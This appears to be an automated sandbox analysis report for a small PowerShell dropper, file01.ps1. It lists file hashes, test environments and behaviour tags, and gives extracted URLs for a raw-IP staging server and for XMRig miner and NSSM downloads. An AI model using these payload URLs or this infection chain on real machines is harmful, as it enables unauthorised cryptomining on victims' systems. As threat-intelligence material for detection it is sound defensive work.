General
-
Target
file01.ps1
-
Size
148B
-
Sample
240705-g492bstenk
-
MD5
ccab7cc0213131da914474a10380dcc8
-
SHA1
601d9886a23026652da753780d335125b9d41749
-
SHA256
9af65b08db3c9f1a34d9951e746df61da38da630bbeee5f63f0191664b7cf768
-
SHA512
2cf263e50f9674fde2239895d5ac9a08989e12f869030456a6bd67bd7a95be41f46f8506f7afde1b172d0b6174b0893ec2841c43020d3e1432eef1b038c5efff
Static task
static1
Behavioral task
behavioral1
Sample
file01.ps1
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
file01.ps1
Resource
win10v2004-20240704-en
Malware Config
Extracted
http://185.254.97.190:2024/test.txt
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip
Targets
-
-
Target
file01.ps1
-
Size
148B
-
MD5
ccab7cc0213131da914474a10380dcc8
-
SHA1
601d9886a23026652da753780d335125b9d41749
-
SHA256
9af65b08db3c9f1a34d9951e746df61da38da630bbeee5f63f0191664b7cf768
-
SHA512
2cf263e50f9674fde2239895d5ac9a08989e12f869030456a6bd67bd7a95be41f46f8506f7afde1b172d0b6174b0893ec2841c43020d3e1432eef1b038c5efff
-
XMRig Miner payload
-
Blocklisted process makes network request
-
Executes dropped EXE
-
Legitimate hosting services abused for malware hosting/C2
-